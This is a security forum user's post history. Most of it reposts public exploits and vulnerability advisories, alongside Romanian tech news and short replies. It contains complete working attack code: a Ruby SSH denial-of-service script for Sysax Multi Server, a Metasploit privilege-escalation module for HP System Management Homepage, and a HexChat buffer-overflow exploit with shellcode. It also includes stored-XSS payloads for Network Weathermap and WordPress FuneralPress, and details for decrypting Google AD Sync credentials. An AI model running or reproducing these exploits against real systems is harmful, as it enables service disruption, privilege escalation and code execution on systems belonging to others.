Jump to content

Kwelwild

Active Members
 View Profile  See their activity

  • Posts

    638

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Kwelwild

  1. Kwelwild
    Description: HashCollect.py is a python tool I wrote that will scrape md5 hashes out of a specific file or url. While this script is pretty bare right now it gets the job done. I have many plans for it, that you will hopefully see soon. That's it for now, but I will grow this out soon. Some of the features I am thinking about adding are: -Allow custom regex -Allow for pulling other hashes like SHA256 -Check hashes against online hash crackers -Output to a database -Create a frontend -What would you like to see? Find out more at TekDefense - News Twitter: @TekDefense Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Tektip Ep27 - Hashcollect
  2. Kwelwild
    Google AD Sync Tool - Exposure of Sensitive Information Vulnerability Sense of Security - Security Advisory - SOS-13-001 Release Date. 03-Apr-2013 Last Update. - Vendor Notification Date. 03-Sep-2012 Product. Google Active Directory Sync (GADS) Tool Platform. Windows, Linux, Solaris Affected versions. All versions up to 3.1.3 Severity Rating. High Impact. Exposure of sensitive information Attack Vector. From local without authentication Solution Status. Upgrade to version 3.1.6 CVE reference. CVE - not yet assigned Details. Due to a weakness in the way the Java encryption algorithm (PBEwithMD5andDES) has been implemented in the GADS tool all stored credentials can be decrypted into plain-text. This includes all of the encrypted passwords stored in any end-users saved XML configuration file, such as Active Directory accounts, SMTP, Proxy details, LDAP and OAuth tokens, etc. Proof of Concept. Using the following information from the XML and GADS tool to decrypt all encrypted passwords from any XML: 1. The hard coded salt: SALT[] = { -87, -101, -56, 50, 86, 53, -29, 3 } 2. The hard coded DES interation count: ITERATION_COUNT = 20 3. The Secret key derived from the uniqueID value in the XML: 6512630db9a74d90a5531f574b85f398 4. The cipher-text from the XML: <encryptedAdminPassword>1edOUtamjNA=</encryptedAdminPassword> 5. The algorithm: PBEwithMD5andDES The decrypted value is: winning! Solution. Upgrade to version 3.1.6 Discovered by. Nathaniel Carew from Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's largest organisations. Sense of Security Pty Ltd Level 8, 66 King St Sydney NSW 2000 AUSTRALIA T: +61 (0)2 9290 4444 F: +61 (0)2 9290 4455 W: http://www.senseofsecurity.com.au/consulting/penetration-testing E: info@senseofsecurity.com.au Twitter: @ITsecurityAU The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php Sursa: Google AD Sync Tool - Exposure of Sensitive Information Vulnerability
  3. Kwelwild
    Sysax Multi Server 6.10 - SSH Denial of Service #!/usr/bin/env ruby # Sysax Multi Server 6.10 SSH DoS # Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts "Usage: ruby #{$0} [host] [port]\n" exit end packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, #3rd byte in this next line causes crash 0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*") host = ARGV[0] port = ARGV[1] sock = TCPSocket.open(host, port) banner = sock.gets() puts banner sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.puts(packet) resp = sock.gets() sock.close() Sursa: Sysax Multi Server 6.10 - SSH Denial of Service
  4. Kwelwild
    PM Sent!
  5. Kwelwild

    Chat

    Kwelwild replied to Specia's topic in Sugestii

    Si eu care ma pregateam sa vorbesc cu Nytro sa faca un chat Glumeam, penibil om
  6. Kwelwild
    Din moment ce ai vazut acolo 'nasa.gov' normal ca e interesant. Pun pariu ca nu l-ai testat (asta pentru ca probabil nu stii cum functioneaza).
  7. Kwelwild
    Butonul de pe Facebook despre care putini stiu ca exista. Cum poti avea "intimitate" totala online Potrivit unui site de specialitate, exista o solutie foarte simpla pentru cei care folosesc Facebook, dar nu sunt interesati deloc de aplicatii sau reclame. Exista o metoda prin care alte site-uri sau aplicatii nu mai pot avea acces la contul tau. Platforma Facebook cuprinde de asemenea jocuri, aplicatii si alte site-uri integrate retelei de socializare. Ea permite accesarea si distribuirea informatiilor personale ale utilizatorilor. Daca iti doresti “intimitate” totala pe Facebook, cea mai buna metoda este sa opresti aceasta platforma, iar astfel orice distribuire de date personale va fi blocata, scrie Life Hacker. Desigur, daca vei face asta, nici tu nu vei mai putea folosi aplicatiile sau site-urile integrate platformei. Pentru oprirea ei, trebuie mers la “privacy settings” si dai click pe butonul Edit in sectiunea Apps you use. Apoi, daca esti hotarat sa faci acest pas, apesi pe Platform turn off. Sursa: Butonul de pe Facebook despre care putini stiu ca exista. Cum poti avea "intimitate" totala online
  8. Kwelwild
    HP System Management Homepage Local Privilege Escalation ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Post::Common include Msf::Exploit::Local::Linux def initialize(info={}) super( update_info( info, { 'Name' => 'HP System Management Homepage Local Privilege Escalation', 'Description' => %q{ Versions of HP System Management Homepage <= 7.1.2 include a setuid root smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR env variable. }, 'License' => MSF_LICENSE, 'Author' => [ 'agix' # @agixid # Vulnerability discovery and Metasploit module ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell' ], 'Payload' => { 'Space' => 227, 'BadChars' => "\x00\x22" }, 'References' => [ ['OSVDB', '91990'] ], 'Targets' => [ [ 'HP System Management Homepage 7.1.1', { 'Arch' => ARCH_X86, 'CallEsp' => 0x080c86eb, # call esp 'Offset' => 58 } ], [ 'HP System Management Homepage 7.1.2', { 'Arch' => ARCH_X86, 'CallEsp' => 0x080c8b9b, # call esp 'Offset' => 58 } ], ], 'DefaultOptions' => { 'PrependSetuid' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => "Mar 30 2013", } )) register_options([ OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ]) ], self.class) end def exploit pl = payload.encoded padding = rand_text_alpha(target['Offset']) ret = [target['CallEsp']].pack('V') exploit = pl exploit << ret exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11 exploit << "\xe9\x0e\xff\xff\xff" # jmp => begining of pl exploit << padding exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better id=cmd_exec("id -un") if id!="hpsmh" fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this") end cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)") cmd_exec("#{datastore['smhstartDir']}/smhstart") end end Sursa: HP System Management Homepage Local Privilege Escalation ? Packet Storm
  9. Kwelwild
    HexChat 2.9.4 Local Exploit Submission #!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"*30 shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x68\x6b\x6d\x4b\x4b\x69" "\x44\x34\x64\x64\x59\x64\x74\x71\x78\x52\x6c\x72\x33\x47\x34" "\x71\x78\x49\x42\x44\x4e\x6b\x50\x71\x50\x30\x4e\x6b\x64\x36" "\x54\x4c\x4c\x4b\x44\x36\x77\x6c\x4c\x4b\x33\x76\x77\x78\x4c" "\x4b\x73\x4e\x51\x30\x4e\x6b\x75\x66\x56\x58\x72\x6f\x72\x38" "\x51\x65\x68\x73\x43\x69\x37\x71\x38\x51\x39\x6f\x58\x61\x73" "\x50\x4e\x6b\x30\x6c\x36\x44\x77\x54\x6c\x4b\x42\x65\x75\x6c" "\x6e\x6b\x73\x64\x36\x48\x31\x68\x46\x61\x6a\x4a\x4e\x6b\x52" "\x6a\x66\x78\x6e\x6b\x73\x6a\x57\x50\x43\x31\x7a\x4b\x6d\x33" "\x34\x74\x42\x69\x6c\x4b\x47\x44\x4c\x4b\x67\x71\x48\x6e\x74" "\x71\x6b\x4f\x36\x51\x79\x50\x6b\x4c\x4e\x4c\x4c\x44\x39\x50" "\x34\x34\x75\x57\x49\x51\x4a\x6f\x36\x6d\x67\x71\x4a\x67\x5a" "\x4b\x5a\x54\x67\x4b\x71\x6c\x61\x34\x34\x68\x32\x55\x6d\x31" "\x6e\x6b\x33\x6a\x47\x54\x76\x61\x38\x6b\x71\x76\x4c\x4b\x64" "\x4c\x52\x6b\x4e\x6b\x71\x4a\x67\x6c\x67\x71\x4a\x4b\x4e\x6b" "\x74\x44\x4c\x4b\x76\x61\x69\x78\x4e\x69\x62\x64\x66\x44\x47" "\x6c\x63\x51\x5a\x63\x6e\x52\x33\x38\x61\x39\x69\x44\x6b\x39" "\x59\x75\x6c\x49\x58\x42\x73\x58\x4e\x6e\x72\x6e\x56\x6e\x58" "\x6c\x62\x72\x4d\x38\x4f\x6f\x6b\x4f\x69\x6f\x69\x6f\x4f\x79" "\x61\x55\x75\x54\x6d\x6b\x31\x6e\x4e\x38\x79\x72\x70\x73\x6f" "\x77\x45\x4c\x45\x74\x70\x52\x39\x78\x6c\x4e\x4b\x4f\x49\x6f" "\x59\x6f\x6f\x79\x43\x75\x55\x58\x73\x58\x62\x4c\x70\x6c\x51" "\x30\x77\x31\x53\x58\x67\x43\x54\x72\x66\x4e\x61\x74\x71\x78" "\x52\x55\x44\x33\x62\x45\x61\x62\x6d\x58\x51\x4c\x75\x74\x57" "\x7a\x4c\x49\x58\x66\x73\x66\x6b\x4f\x30\x55\x47\x74\x6b\x39" "\x4f\x32\x72\x70\x4d\x6b\x39\x38\x6d\x72\x72\x6d\x4f\x4c\x4b" "\x37\x35\x4c\x67\x54\x30\x52\x5a\x48\x75\x31\x39\x6f\x6b\x4f" "\x39\x6f\x33\x58\x42\x4f\x34\x38\x53\x68\x31\x30\x72\x48\x35" "\x31\x73\x57\x61\x75\x62\x62\x35\x38\x72\x6d\x72\x45\x54\x33" "\x62\x53\x54\x71\x69\x4b\x6f\x78\x33\x6c\x75\x74\x54\x4a\x6f" "\x79\x78\x63\x61\x78\x72\x78\x45\x70\x77\x50\x75\x70\x70\x68" "\x72\x6d\x50\x53\x37\x36\x77\x51\x70\x68\x43\x42\x30\x6f\x42" "\x4d\x71\x30\x35\x38\x52\x4f\x66\x4c\x31\x30\x61\x76\x61\x78" "\x71\x58\x50\x65\x42\x4c\x32\x4c\x55\x61\x5a\x69\x6e\x68\x72" "\x6c\x61\x34\x44\x50\x4f\x79\x4d\x31\x56\x51\x4b\x62\x33\x62" "\x61\x43\x46\x31\x52\x72\x39\x6f\x58\x50\x46\x51\x49\x50\x42" "\x70\x69\x6f\x36\x35\x34\x48\x41\x41" ) junk2 = "A"*(13306-len(shellcode)) stage1 = "\x4c\x4c\x77\x21" # 21 byte jump (JA) ret = "\x63\x64\x62\x68" # ASCII PPR junk3 = "C"*29 stage2 = "\x61"*38 # POPAD x 38 stage2 += "\x54" # PUSH ESP stage2 += "\xE9" # RETN # This byte is a bad char, but gets converted to RETN and \x88 junk4 = "D"*11586 print "Copy this text, and enter into HexChat's textbox: \"/server [string]\"" print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4 Sursa: HexChat 2.9.4 Local Exploit Submission
  10. Kwelwild
    PM Sent!
  11. Kwelwild
    PM Sent!
  12. Kwelwild
    PM Sent!
  13. Kwelwild
    Done! PM Sent!
  14. Kwelwild
    Facebook Home. Totul despre aplicatia Android lansata joi seara. Chatul e mult imbunatatit. Aplicatia a fost lansata joi la sediul Facebook din Menlo Park. Mark Zuckerberg a lansat joi seara Facebook Home, destinata unor anumite gadgeturi cu sistemul de operare Android. Aceasta iti schimba total smartphone-ul, transformandu-l intr-unul dedicat Facebook. "Nu construim un telefon, si nu construim un sistem de operare, dar facem mai mult decat o aplicatie", a declarat fondatorul retelei sociale, Mark Zuckerberg. Facebook Home preia controlul telefonului inca de la deblocarea acestuia, dupa ce este instalata. Ea reuneste mai multe aplicatii ale retelei sociale care iti permit sa tii legatura cu prietenii mai usor. Facebook Home merge pe aceeasi linie pe care se centreaza Facebook, cu interfete cu imagini mari. "In mod normal, cand iti pornesti telefonul vezi un ceas, un email sau un calendar. Cu Home, dam mai multa valoare acestui ecran. De indata ce iti pornesti telefonul, asta vezi", a spus Adam Mosseri, director de produse la Facebook. Ecranul principal al telefonul se transforma intr-un asa-numit Cover Feed, o versiune de telefonul a News Feedului. Mesageria este mult imbunatatita datora acelor "Chat Heads". Aplicatia te ajuta sa urmaresti mai usor notificarile, iar gesturile de utilizare sunt naturale. Cory Ondrejka de la Facebook a declarat ca aplicatia se gaseste in Google Play si va merge pe diferite dispozitive, telefoane si tablete deopotriva. Pentru tablete, spune ca experienta va fi geniala. Facebook a lansat acum doar versiunea pentru telefoane. Cea pentru tablete va veni peste cateva luni. Aplicatia va fi imbunatatita constant, luna de luna, mai promite reprezentatul Facebook. Aplicatia va putea fi folosita, pentru inceput, pe HTC One, One X, Samsung Galaxy S3, Note II si Galaxy S4, intr-o prima faza. Ea va putea fi descarcata din 12 aprilie. Iata cum iti pui Facebook Home pe telefon: http://www.youtube.com/watch?feature=player_embedded&v=tWKE0HTl0ig Facebook Home va putea fi descarcata, deocamdata, doar de catre americani, insa Zuckerberg a promis ca ea va fi disponibila si pentru alte zone ale globului in scurt timp, daca totul merge bine. De asemenea, ea va fi imbogatita cu noi feature-uri, in timp. Intrebat cand va aparea o aplicatie similara pentru alte sisteme de operare, Zuckerberg a declarat ca are o relatie extraordinara cu cei de la Apple, dar ca "modul in care lucrezi cu diferite sisteme de operare e altul de fiecare data. Cei de la Apple sunt mult mai inchisi. Android e mult mai deschis". "Windows este undeva la mijloc", mai spune el. La acelasi eveniment a fost lansat si HTC First, un telefon mobil lansat de taiwanezi in colaborare cu Facebook si cu operatorul de telefonie mobila american AT&T. Acesta va avea aplicatia Facebook Home integrata si va fi disponibil doar in SUA incepand din 12 aprilie. Deocamdata se pot face precomenzi. Telefonul va fi 4G, insa specificatiile lui complete nu au fost date publicitatii. Sursa: Facebook Home. Totul despre aplicatia Android lansata joi seara. Chatul e mult imbunatatit. VIDEO - www.yoda.ro
  15. Kwelwild
    Description: In this video Matt Graeber talking about Parsing Binary File Formates with Powershell Why parse binary file formats? Malware Analysis You needs the ability to compare a malicious/malformed file against known good files. Fuzzing You want to generate thousands or millions of malformed files of a certain format in order to stress test or find vulnerabilities in programs that open that particular file format. Curiosity you simply want to gain an understanding of how a piece of software interprets a particular file format. Why use PowerShell to parse binary file formats? Once parsed, file formats can be represented as objects Objects can be inspected, analyzed, and/or manipulated with ease. Its output can be passed to other functions/cmdlets/scripts for further processing. Automation! Once a parser is written, you can analyze a large number of file formats, quickly perform analysis, and gather statistics on a large collection of files. Example: You could analyze all known good file formats on a clean system, take a baseline of known good and use that as a heuristic to determine if an unknown file is potentially malicious or malformed. Slide : -http://www.exploit-monday.com/2013/03/ParsingBinaryFileFormatsWithPowerShell.html Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Parsing Binary File Formats With Powershell
  16. Kwelwild
    Description: The video above is just a short demo of the worm propagation simulation. For full details, please read our newly launched blog here: SecurityTube.net Hack of the Day: Simulating an SSH Worm using Python Please leave your comments behind! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Simulating An Ssh Worm In Python
  17. Kwelwild
    Google poate fi amendata in Uniunea Europeana pentru incalcarea intimitatii 27 de tari, printre care si Romania, ar putea amenda colosul american pentru nerespectarea regulilor cu privire la intimitate, reguli instaurate in martie 2012. Cu Franta la carma, organizatii din Marea Britanie, Olanda, Germania, Spania si Italia vor ca americanii de la Google sa plateasca pentru nerespectarea intimitatii. Organizatiile europene vor sa stie ce fel de informatii pastreaza Google de la utilizatori, pe ce perioada si daca aceste informatii vor ajunge la terti. Amenzile ar urma sa fie platite pentru fiecare tara din Uniunea European, inclusiv Romania. Amenda nu este foarte mare, Franta poate cere pana la 300.000 de euro, in timp ce Regatul Unit nu poate cere mai mult de 500.000 de lire sterline. Google castiga 300.000 de euro in trei minute, castigul pe an al companiei americane fiind in jur de 61 de miliarde de dolari. Google domina piata de online in Europa, mai bine de 95% din cautarile utilizatorilor europeni fiind facute prin motorul american. In comparatie, americanii folosesc Google in proportie de 65%. In urma cu o aproape o luna de zile Google a acceptat sa plateasca 7 milioane de dolari pentru colectarea "accidentala" a datelor prin Wi-Fi in timp ce fotografia strazile din Statele Unite pentru celebrul serviciu Street View. Sursa: Google poate fi amendata in Uniunea Europeana pentru incalcarea intimitatii - www.yoda.ro
  18. Kwelwild
    Esti cumva din hackerville?! Daca nu, iti place la ramnicu valcea?!
  19. Kwelwild
    Network Weathermap 0.97a (editor.php) - Persistent XSS Network Weathermap 0.97a - Persistent XSS Earlier versions are also possibly vulnerable. INFORMATION Product: Network Weathermap 0.97a Remote-exploit: yes Vendor-URL: http://www.network-weathermap.com/ Discovered by: Daniel Ricardo dos Santos CVE Request - 15/03/2013 CVE Assign - 18/03/2013 CVE Number - CVE-2013-2618 Vendor notification - 18/03/2013 Vendor reply - No reply Public disclosure - 01/04/2013 OVERVIEW Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying available files. INTRODUCTION Network Weathermap is a network visualisation tool, to take data you already have and show you an overview of your network in map form. Support is built in for RRD, MRTG (RRD and old log-format), and tab-delimited text files. Other sources are via plugins or external scripts. VULNERABILITY DESCRIPTION The vulnerability happens when a user injects HTML and Javascript into the title of a map in editor.php. This title is later shown to the user when listing the files in editor.php?action=newfile Besides the title, other fields also allow an attacker to upload malicious PHP code to a webserver, which can later be executed if the attacker has direct acess to that file. This application is often used as a plugin for Cacti. The vulnerability can be exploited in this mode as well, in weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and it can be used to exploit Cacti. To test it, simply create a map or edit an existing one: GET editor.php?mapname=test&action=newmap Then edit the map title with the payload: POST editor.php plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO Then display the titles: GET editor.php VERSIONS AFFECTED Tested with version 0.97a (current release) but earlier versions are possibly vulnerable. SOLUTION There is no official patch currently available. NOTES The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-2618 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CREDITS Daniel Ricardo dos Santos SEC+ Information Security Company - http://www.secplus.com.br/ Sursa: Network Weathermap 0.97a (editor.php) - Persistent XSS
  20. Kwelwild
    Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS # # # WP FuneralPress - stored xss in guestbook # # "FuneralPress is an online website obituary management and guest book program for funeral homes and cemeteries" # http://wpfuneralpress.com/ # # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1 # # impact: # malicious script execution as wordpress administrator # # author: robarmstrong.te71@gmail.com # summary A low-privilege or guest user can inject code via the <textareaname="photo-message">, < textarea name="youtube-message"> and <textarea name="message"> elements which are part of the wpfh_upload_form form in http://site/obituaries/?id=[ID]&f=guestbook&m=add Scripts injected via the "photo-message" and "youtube-message" elements will be executed by the admin user when they browse to the guestbook admin page at http://site/wp-admin/admin.php?page=wpfh-guestbook If a malicious post is approved by the admin, the script will be run by anyone viewing the guestbook. # details There appears to be some basic xss protection on form submissions using < textarea name="message"> and code injected via this element is not served up on the guestbook admin page. Despite this, scripts injected via an iframe or embedded svg will be executed by anyone viewing the guestbook at http://site/obituaries/?id=1&f= guestbook on the condition that the post is approved by the site administrator. The chances of an administrator approving a malicious message are increased if some normal-looking text is inserted above the malicious code, resulting in a legitimate looking "Message Preview" field on the admin page. ## message post example: 1. Attacker browses to: 